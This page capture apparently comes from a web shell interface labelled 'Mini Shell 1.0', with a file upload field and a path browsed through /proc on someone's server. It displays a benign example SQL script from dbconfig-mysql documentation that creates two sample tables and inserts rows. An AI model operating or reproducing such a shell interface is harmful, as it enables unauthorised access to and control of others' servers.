HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/1991109/root/usr/share/doc/dbconfig-mysql/examples/db-test-sqlite3-2.0/
Upload File :
Current File : //proc/1991109/root/usr/share/doc/dbconfig-mysql/examples/db-test-sqlite3-2.0/sqlite.sql
create table foo (
	id	int not null primary key,
	name	varchar(32)
);

create table mytable (
	version	varchar(32) not null primary key
);

insert into foo values (1, 'foo');
insert into foo values (2, 'bar');
delete from mytable;
insert into mytable values ('2.0');